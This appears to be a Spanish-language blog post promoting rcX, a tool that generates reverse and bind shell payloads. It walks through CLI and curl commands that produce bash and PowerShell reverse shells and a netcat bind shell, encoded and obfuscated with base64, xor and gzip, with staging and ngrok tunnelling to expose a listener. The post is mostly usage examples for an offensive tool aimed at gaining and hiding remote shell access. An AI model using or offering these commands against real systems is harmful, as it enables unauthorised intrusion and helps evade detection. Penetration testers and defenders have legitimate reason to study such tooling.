rcX Un Potente Generador de Shell Inversa
rcX Un Potente Generador de Shell Inversa

rcX: Un Potente Generador de Shell Inversa

El predecesor de rcX es rsGen (un generador de carga útil inversa). Actualmente, es un potente generador de reverse shell y bind shell. En el futuro se añadirán más funciones.

  • rc” – significa comando remoto o código remoto (remote command).
  • X” – se puede entender como asistente o herramienta.

Uso Local

Descarga los binarios empaquetados aquí, o ejecuta el siguiente comando:

pip install -r requirements.txt

Uso de la CLI

Ejemplos:

1. Obtener una shell inversa de bash y la salida en formato tabular.

python rcX.py -l 127.0.0.1 -p 8888 -t bash --table
Uso CLI de rcX
Uso CLI de rcX

2.Ruta de acceso al shell personalizada.

python rcX.py -l 127.0.0.1 -p 8888 -t bash -s "/bin/sh"

3. Copiar la carga útil de id especificada en el portapapeles.

python rcX.py -l 127.0.0.1 -p 8888 -t bash --table -c 5

4. Obtener un shell inverso bash codificado en base64.

python rcX.py -l 127.0.0.1 -p 8888 -t bash -e base64

5. Obtener una shell inversa bash codificada y ofuscada.

python rcX.py -l 127.0.0.1 -p 8888 -t bash -e xor --obf reverse --table --clip 7
Ejemplo de shell inversa ofuscada
Ejemplo de shell inversa ofuscada
  1. Obtener una shell inversa bash de staging.
python rcX.py -l 127.0.0.1 -p 8888 -t bash --staging-url 0 --staging-cmd 0

7. Obtener una shell inversa bash y reenviar el puerto local utilizando el túnel ngrok.

python rcX.py -l 127.0.0.1 -p 8888 -t bash --tunnel ngrok_jp

8. Obtener un shell inverso de Windows Powershell.

python rcX.py -l 127.0.0.1 -p 8888 -t powershell -P windows

Interfaz web

Al mismo tiempo, rcX también proporciona una interfaz web. Utiliza rcX como servidor y luego podrás utilizarlo con tu equipo o amigos.

Consejo

Cuando rcX se ejecuta como servidor, si el origen de la petición no es 127.0.0.1 o localhost, la función de túnel ngrok se desactivará y las opciones relacionadas se ocultarán en el Front-end

Ejemplo:

python rcX.py -w

Web CLI

Cuando rcX se ejecuta como servidor, puedes utilizar curl en el terminal para obtener la carga útil.

Ejemplos:

1. Obtener una carga útil de shell inversa bash

curl http://127.0.0.1/linux/bash/127.0.0.4/8888
Ejemplo de web CLI con rcX
Ejemplo de web CLI con rcX

2. Codificación Base64

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64

3. Codificación Base64 y hexadecimal

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64,hex

4. Compresión Gzip y replace_char (método de ofuscación)

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/gzip/replace_char

5. xor codificado e inverso(método de ofuscación)

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/xor/reverse

6. Obtener una carga útil de shell inversa de Windows PowerShell

curl http://127.0.0.1/windows/powershell/127.0.0.4/44444

7. replace_char(método de ofuscación) sólo sin usar codificador

curl http://127.0.0.1/windows/powershell/127.0.0.4/44444/,/replace_char

8. Utilizar sólo la puesta en escena, sin ningún codificador y ofuscador

curl http://127.0.0.1/linux/bash/127.0.0.4/8888/,/,/1/1

9. Obtener una carga útil de shell bind netcat

curl http://127.0.0.1/bind/linux/netcat/127.0.0.4/8888
https://github.com/FlyfishSec/rcX

🤞 ¡El Gran Hermano te vigila, pero sabemos cómo detenerlo!

¡No enviamos spam! Lee nuestra Política de Privacidad para más información.

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.

Mi Carro Close (×)

Tu carrito está vacío
Ver tienda